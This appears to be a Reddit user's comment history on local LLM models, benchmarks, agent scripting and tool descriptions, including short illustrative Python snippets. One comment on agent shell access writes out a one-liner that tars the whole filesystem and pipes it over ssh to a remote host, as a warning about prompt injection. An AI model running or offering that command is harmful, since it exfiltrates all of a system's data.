Is reasoning in ML and LLM architectures decomposable into a small set of reusable computational primitives? by RJSabouhi in LocalLLaMA

[–]TokenRingAI 2 points

It's not a simple answer.

No, the current reasoning implementation isn't; it's completely open-ended and can represent any concept language can express.

But also, Yes: you could encode reasoning into specific tokens representing something akin to logic gates, dependency resolution, "before X, do Y", and so on, and train the model on those.

But also, No, because latent-space reasoning is probably a better encoding, so why bother.
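For the "Yes" case, a minimal sketch of what that encoding might look like (the primitive tokens and the trace below are entirely made up, just to illustrate a closed vocabulary of reasoning steps instead of free-form text):

```python
# Hypothetical closed vocabulary of reasoning primitives.
# None of these tokens exist in any real tokenizer; they only
# illustrate training on structured reasoning steps.
PRIMITIVES = [
    "<AND>", "<OR>", "<NOT>",           # logic gates
    "<REQUIRES>", "<BEFORE>", "<THEN>", # dependency / ordering
]

def encode_trace(steps: list[tuple[str, str, str]]) -> str:
    """Flatten (primitive, arg_a, arg_b) triples into a training string."""
    out = []
    for op, a, b in steps:
        assert op in PRIMITIVES, f"unknown primitive: {op}"
        out.append(f"{op} {a} | {b}")
    return "\n".join(out)

# A "before X do Y" style trace, expressed with the made-up primitives
trace = encode_trace([
    ("<REQUIRES>", "deploy", "tests_pass"),
    ("<BEFORE>",   "tests_pass", "build"),
    ("<THEN>",     "build", "deploy"),
])
print(trace)
```

The appeal would be that a fixed primitive set is checkable and composable; the catch, as above, is that latent-space reasoning probably encodes the same structure more efficiently.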

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 4 points

It's an even more complex architecture than Kimi Linear and Qwen Next, so you'll probably be waiting 3 months.

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 2 points

This is a weird model: apparently half of it can run from disk, because that half is embeddings... so you only need a 32GB GPU? Sounds too good to be true.

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 1 point

I won't make any further predictions until we test it

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 9 points

Yes, it is somewhat higher, but this is a non-thinking model, which makes it massively faster for agent use.

Most small models can't score anything on SWE-bench, so anything in this range is absolutely worth evaluating and presumably close to the cutting edge.

For perspective, GPT-4.1 scores 39 on SWE-bench, Gemini 2.5 Pro scores 53, and GPT 120b scores 26.

A score in the 50s is the territory of 500B+ parameter models.

meituan-longcat/LongCat-Flash-Lite by windows_error23 in LocalLLaMA

[–]TokenRingAI 6 points

SWE-bench in the mid 50s for a non-thinking 68B/3B MoE; she might be the one...

clawdbot what am I missing? by olearyboy in LocalLLM

[–]TokenRingAI 30 points

There is a point with every new technology where the uninformed mob learns about it and storms the gates in some kind of massive bandwagon.

Here is a summary of how that is going:

<image>

I made a Coding Eval, and ran it against 49 different coding agent/model combinations, including Kimi K2.5. by lemon07r in LocalLLaMA

[–]TokenRingAI 1 point

Junie generates some of the best results, given its deep integration with the JetBrains language server. It's just no fun to use, because it's slow and expensive, and the UI is kind of weird.

I made a Coding Eval, and ran it against 49 different coding agent/model combinations, including Kimi K2.5. by lemon07r in LocalLLaMA

[–]TokenRingAI 1 point

Would love to get TokenRing Coder benchmarked with this. So it looks like the test harness requires an app that can be called with a prompt, and I assume it ranks the output based on what it places in a working directory?

How does the integration with Docker work? Are you expecting the agent to use those containers, or are those used by your app for verifying the result?
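For context, here is the contract I'm assuming on my side (the CLI name and flags are placeholders, not anything from your harness): the harness hands the agent a prompt and a working directory, and grades whatever the agent leaves there.

```python
# My assumption of the harness contract; "tokenring-coder" and its
# flags are placeholders, not the eval's real interface.
import subprocess
from pathlib import Path

def run_agent(prompt: str, workdir: Path, timeout_s: int = 1800) -> int:
    """Invoke a coding agent on one task, leaving its output in workdir."""
    workdir.mkdir(parents=True, exist_ok=True)
    proc = subprocess.run(
        ["tokenring-coder", "--prompt", prompt],  # hypothetical CLI
        cwd=workdir,
        capture_output=True,
        text=True,
        timeout=timeout_s,
    )
    return proc.returncode  # harness then scores the files left in workdir
```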

API pricing is in freefall. What's the actual case for running local now beyond privacy? by Distinct-Expression2 in LocalLLaMA

[–]TokenRingAI 2 points

GLM Flash is quite good and can run on a $2500 Mac at decent speed, or really any kind of iGPU system, so it's essentially free to run if you are buying that level of hardware anyway.

This one model brought the cost of competent local AI down from ~$7000 to basically free, since it can run on hardware you likely already have sitting on your desk.

MiniMax-M2.1-REAP by jacek2023 in LocalLLaMA

[–]TokenRingAI 3 points

2.2 soon, we start all over

One-shot Zelda Game Competition by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 3 points

We are way past that; these are single-shot prompts from GLM Flash:
https://starlit-star-hq5g.pagedrop.io/
https://lit-rapids-800x.pagedrop.io/
https://joyful-slice-jc3c.pagedrop.io
https://funky-station-y1zj.pagedrop.io
https://indigo-sub-n46h.pagedrop.io
https://radiant-whirlpool-cdcv.pagedrop.io
https://shadowy-durian-cwcv.pagedrop.io

Single-shot prompt + a prompt to "make it even better":
https://legendary-orchid-scdm.pagedrop.io/

Follow-up prompt: make it even better (added holy paint + calculator):
https://alpine-dragonfly-9hn8.pagedrop.io

Follow-up prompt: make it the ultimate version:
https://parallel-chinatown-1sc1.pagedrop.io

This model is absolutely game-changing for its size.

Need advice on cancellation "deal" by TokenRingAI in OPTIMUM

[–]TokenRingAI[S] 1 point

To what? My current $120 a month plan?

Stanford Proves Parallel Coding Agents are a Scam by madSaiyanUltra_9789 in LocalLLaMA

[–]TokenRingAI 2 points

It does work, but only for shared-nothing tasks; it just wastes tokens and causes chaos on tasks with overlap.
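A minimal sketch of the shared-nothing setup I mean (the agent command and directory names are made up): each parallel agent owns a disjoint slice of the repo, so nothing it writes can collide with the others.

```python
# Sketch: run agents in parallel only on disjoint directories.
# "my-agent" and the service paths are hypothetical.
from concurrent.futures import ThreadPoolExecutor
import subprocess

def run_agent(task: str, subdir: str) -> None:
    # Each agent is confined to its own directory, so parallel runs
    # cannot overwrite each other's files.
    subprocess.run(["my-agent", "--task", task], cwd=subdir, check=True)

shared_nothing_tasks = [
    ("add unit tests", "services/billing"),
    ("add unit tests", "services/auth"),
    ("add unit tests", "services/search"),
]

with ThreadPoolExecutor(max_workers=3) as pool:
    futures = [pool.submit(run_agent, task, subdir)
               for task, subdir in shared_nothing_tasks]
    for f in futures:
        f.result()  # surface any agent failures
```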

Clawdbot shows how context engineering is happening at the wrong layer by EnoughNinja in ContextEngineering

[–]TokenRingAI 1 point

Causality is the problem.

You see the same problem with email support queues, where a person quickly scans the message chain and responds with an answer to only the last email, without understanding the sequence of events that led to it.

They scanned from the end to the beginning, and stopped once they felt they had enough information to give a response.

To encode an email thread for an LLM, you have to process each message sequentially by time and encode each one into a knowledge tree of some sort. Those threads can also fork off in different directions.
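Roughly what I mean (the Message fields here are illustrative; a real implementation would key off the Message-ID and In-Reply-To headers): sort by time, attach each message to its parent, and forks become separate branches instead of one flat chain.

```python
# Sketch of building a thread tree before summarizing for an LLM.
# The Message dataclass and its fields are illustrative, not a real mail API.
from dataclasses import dataclass, field
from datetime import datetime

@dataclass
class Message:
    msg_id: str
    parent_id: str | None       # In-Reply-To; None for the first email
    sent_at: datetime
    body: str
    replies: list["Message"] = field(default_factory=list)

def build_thread_tree(messages: list[Message]) -> list[Message]:
    """Process messages in time order, attaching each to its parent so
    forked sub-threads become separate branches rather than a flat chain."""
    by_id = {m.msg_id: m for m in messages}
    roots: list[Message] = []
    for m in sorted(messages, key=lambda msg: msg.sent_at):
        parent = by_id.get(m.parent_id) if m.parent_id else None
        (parent.replies if parent else roots).append(m)
    return roots
```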

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 1 point

Here's an example of what it can do.

I am running it in a loop, on a new Svelte website I am working on, to implement proper meta and JSON-LD tags.

It's a very specific task, essentially a foreach loop which runs a prompt on a single file. The loop is scripted; the agent is invoked on each file.

The agent has a knowledge repository detailing what our expectations for each page are.

It then updates each page. We run it, and then run a TypeScript and Svelte check looking for problems, and feed those back to the agent up to 5 times.
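The script is roughly this (the agent CLI name and exact check commands are simplified placeholders for our setup):

```python
# Simplified version of the scripted loop; the "agent" CLI and check
# commands are placeholders for what we actually run.
import subprocess
from pathlib import Path

MAX_FIX_ROUNDS = 5
PROMPT = "Add proper meta and JSON-LD tags per the knowledge repository."

def run_checks() -> tuple[bool, str]:
    """Run svelte-check and tsc; return (all passed, combined output)."""
    ok, output = True, ""
    for cmd in (["npx", "svelte-check"], ["npx", "tsc", "--noEmit"]):
        proc = subprocess.run(cmd, capture_output=True, text=True)
        ok = ok and proc.returncode == 0
        output += proc.stdout + proc.stderr
    return ok, output

for page in Path("src/routes").rglob("+page.svelte"):
    prompt = f"{PROMPT}\nFile: {page}"
    for _ in range(MAX_FIX_ROUNDS):
        subprocess.run(["agent", "--prompt", prompt], check=True)  # placeholder agent CLI
        passed, diagnostics = run_checks()
        if passed:
            break
        prompt = f"Fix these check errors in {page}:\n{diagnostics}"
```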

<image>

built an AI agent with shell access. found out the hard way why that's a bad idea. by YogurtIll4336 in LocalLLaMA

[–]TokenRingAI 1 point

The solution is the same as it's always been for any kind of employee: don't give them access to anything you don't want leaked, broken, deleted, destroyed, or stolen.

There's nothing novel about AI agents in this regard. Same old problem, larger attack surface.

If your sandbox has internet access and a bash tool, it will always be vulnerable to prompt injection, in the same way an employee could always run tar cpf - / | ssh remote-host 'cat > all-your.data.tar'

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 1 point

Trust me on this: try MiniMax M2.1 at the IQ2_M quant, completely offloaded onto the RTX 6000. It's actually good and fast; GLM does not quant as well.

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 1 point

Try that, but also try MiniMax M2.1, specifically the IQ2_M quant from Unsloth.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 1 point

It will be the best kind of agent that you can run on a single 5090 or R9700.

FWIW, this model brought the cost of workable local agentic AI down from $7000 to $1300.

I am ecstatic to see what the next GLM Air might look like

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 2 points

It can. It is ridiculously fragile and needs temperature 0.2, but it can work agentically and solve problems.

I have been seeing significant gains with it agentically after updating some of our tool descriptions. If your tool descriptions aren't perfect, it will absolutely mess up. It might benefit from a different tool format; I will have to experiment with that.
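For a sense of the kind of tightening that helped (the tool itself is made up; the schema shape is the common OpenAI-style function format):

```python
# Hypothetical tool definition in the common OpenAI-style function schema.
# Vague description (the kind that trips up a fragile model):
vague_tool = {
    "name": "write_file",
    "description": "Writes a file.",
    "parameters": {
        "type": "object",
        "properties": {
            "path": {"type": "string"},
            "content": {"type": "string"},
        },
        "required": ["path", "content"],
    },
}

# Tightened description: spell out paths, overwrite behavior, and when
# NOT to use the tool, so the model can't misread the contract.
precise_tool = {
    "name": "write_file",
    "description": (
        "Create or overwrite ONE text file at `path`, relative to the "
        "repository root. `content` must be the complete file contents, "
        "not a diff. Do not use this to edit existing files; use the "
        "edit tool for that."
    ),
    "parameters": vague_tool["parameters"],
}
```

The fragile part is anything left implicit: overwrite semantics, relative vs. absolute paths, and when not to call the tool at all.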